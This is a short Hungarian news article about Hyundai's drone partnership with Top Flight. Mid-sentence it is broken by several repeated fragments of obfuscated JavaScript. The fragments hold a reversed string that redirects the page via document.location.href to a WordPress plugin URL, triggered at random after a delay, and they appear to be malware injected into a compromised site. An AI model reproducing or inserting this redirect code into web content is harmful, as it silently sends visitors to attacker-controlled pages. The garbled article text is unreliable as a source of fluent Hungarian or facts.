Kettőről háromdimenziós közlekedésre váltana a Hyundai, és ennek érdekében stratégiai együttműködési megállapodást kötött a Top Flight nevű céggel. Utóbbiak saját fejlesztésű áramfejlesztős/villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros drónja akár két órán át képes repülni, nem kevesebb mint 4 kg terhet cipelve. Ezzel ugyan aligha fog légitaxi szolgáltatást nyitni a Hyundai, viszont a szuperdrón vezérlésénél is használt légiközlekedési logisztikai, illetve térképezési technológiák érdekesek lehetnek a koreai konszern számára, amely autógyártói mivoltán túllépve a mobilitás legkülönfélébb aspektusaiba igyekszik beleásni magát.
- Hirdetés -